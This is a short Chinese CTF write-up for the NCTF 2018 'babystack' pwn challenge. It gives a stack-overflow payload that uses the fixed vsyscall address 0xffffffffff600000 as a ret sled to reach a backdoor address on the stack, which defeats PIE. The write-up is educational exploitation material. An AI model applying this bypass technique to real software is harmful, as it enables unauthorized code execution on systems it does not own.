美文网首页
nctf2018 | pwn wp

nctf2018 | pwn wp

作者: fantasy_learner | 来源:发表于2019-01-16 11:25 被阅读0次

babystack

  • 这道题目用到了一个 vsyscall 的点。。。
  • 保护 : nx , pie
  • 限制 : 输入长度 8 * n
  • 利用过程 :
    • payload = "a" * 0x18 + p64(0xffffffffff600000) * 2
  • 利用:
      1. 栈上有后门函数的地址
      1. """#define VSYSCALL_ADDR_vgettimeofday 0xffffffffff600000"""
      • 2.1 这个地址不参与随机化
      • 2.2 这个vsyscall 执行的指令
        """
        0xffffffffff600000: mov rax,0x60
        0xffffffffff600007: syscall
        0xffffffffff600009: ret"""
      • 2.3 这个指令会不断 ret 栈上的地址,结合后门地址在栈上, 从而 返回到后门函数

相关文章

  • nctf2018 | pwn wp

    babystack 这道题目用到了一个 vsyscall 的点。。。 保护 : nx , pie 限制 : 输入长...

  • 攻防世界 Pwn wp

    0x01get_shell 下载附件后直接丢IDA F5 0x02CGfsb 先用checksec查看开了哪些保护...

  • isitdtuctf_pwn_wp

    babyformat x32 elf | FULL RELRP , NX , PIE 漏洞点 : 格式化字符串 限...

  • fireshell 2019 | pwn wp

    leakless x86 elf | nx 漏洞 : 栈溢出 利用 :使用 puts leak libc , 并第...

  • WhiteHat GrandPrix 2018 QUAL - p

    前几天M4X师傅给了道题看,当时没做出来,后来看了网上的wp之后觉得姿势很骚,wp:http://pwn3r.ti...

  • 网鼎杯pwn WP

    前言 本周参加了两个比赛,一个是de1CTF,另一个是网鼎杯,把这两场比赛全部总结一下。 在网鼎杯中,有幸拿了一个...

  • ciscn-2018-pwn-wp

    echo_back 这题看了大佬的wp才写出来的,触及到了我的知识盲区。。。 参考链接 : http://p4nd...

  • 2019 西湖论剑 | pwn wp

    story 保护 : full relro , stack canary , nx 程序流程 :获取用户 id ...

  • H-game | pwn | wp

    week1 babysc 思路 :shellcode 对应(index + 1)异或处理后再执行 exp aaaa...

  • hackcon ctf 2018 | pwn wp

    BOF 漏洞点:栈溢出 利用过程栈溢出跳转 callMeMaybe 函数 获得flag exp She Sells...

网友评论

      本文标题:nctf2018 | pwn wp

      本文链接:https://www.haomeiwen.com/subject/lxopdqtx.html